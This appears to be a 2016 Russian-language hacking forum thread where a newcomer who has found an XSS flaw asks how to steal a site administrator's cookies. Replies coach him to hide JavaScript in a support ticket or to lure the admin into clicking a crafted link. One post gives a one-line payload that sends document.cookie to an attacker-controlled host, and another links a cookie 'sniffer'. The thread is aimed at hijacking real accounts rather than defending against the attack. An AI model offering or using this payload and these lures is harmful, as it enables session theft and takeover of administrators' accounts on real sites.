как достать куки админа ? (xss)

Discussion in 'Песочница' started by ClayFox, 27 Apr 2016.

  1. ClayFox

    ClayFox New Member

    Joined:
    18 Aug 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    [​IMG]
    всем привет, я хочу изучать xss, читал статьи в форуме, но так и не нашел ответ моего вопроса... Так, я нашел xss в сайте, но дальше не знаю как достать куки админа и так далее... если можно скиньте ссылку на видео или хорошую статью про xss.
    заранее спасибо :)
     
  2. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    195
    Likes Received:
    341
    Reputations:
    47
    Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).
    Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.
     
  3. ClayFox

    ClayFox New Member

    Joined:
    18 Aug 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    a как понять XSS активная или пассивная ?
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    активные и пассивные? ты уверен?
     
    _________________________
  5. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    наверно он не про xss
    на 9 из 10 постов про xss хочется кидать линк, хотя бы на вики
    https://ru.wikipedia.org/wiki/Межсайтовый_скриптинг

    может прочтут

    "если можно скиньте ссылку на видео или хорошую статью про xss."
    блитц вроде что то такое говорил, "машину купил, права купил, ездить не купил"
    то есть в интернетах вы не нашли ни одного описания, ни одного примера использования xss? пздц
     
    _________________________
  6. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    158
    Likes Received:
    37
    Reputations:
    2
    Если в GET:
    document.location=('http://ip/xss.php?' + document.cookie);
    Если в POST:
    забить
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    да ну? иногда лучше жевать
     
    _________________________
  8. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Никто так не делает. Пассивки во фреймах прячутся.
    Не надо новичков путать. Пусть сначала поймут суть, а потом уже с классификацией разбираются.
    Ачат появился раньше, чем классификация сторед/рефлектед/ДОМ стала общепринятой. Во всех статьи у нас XSS делятся именно на активки/пассивки.
     
    crlf likes this.
  9. powerOfthemind

    powerOfthemind New Member

    Joined:
    31 Jul 2015
    Messages:
    41
    Likes Received:
    4
    Reputations:
    1
    Кто-то может поделиться снифером для xss или код скинуть? Буду благодарен
     
  10. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    158
    Likes Received:
    37
    Reputations:
    2
    Как там на жердочке?)
     
  11. nick_sale

    nick_sale Member

    Joined:
    15 Jun 2012
    Messages:
    2
    Likes Received:
    9
    Reputations:
    0
    Держи http://kanick.ru/sniffer/ . Когда-то им пользовался. Не знаю,как сейчас,но раньше работал на ура,скорее всего и сейчас тоже)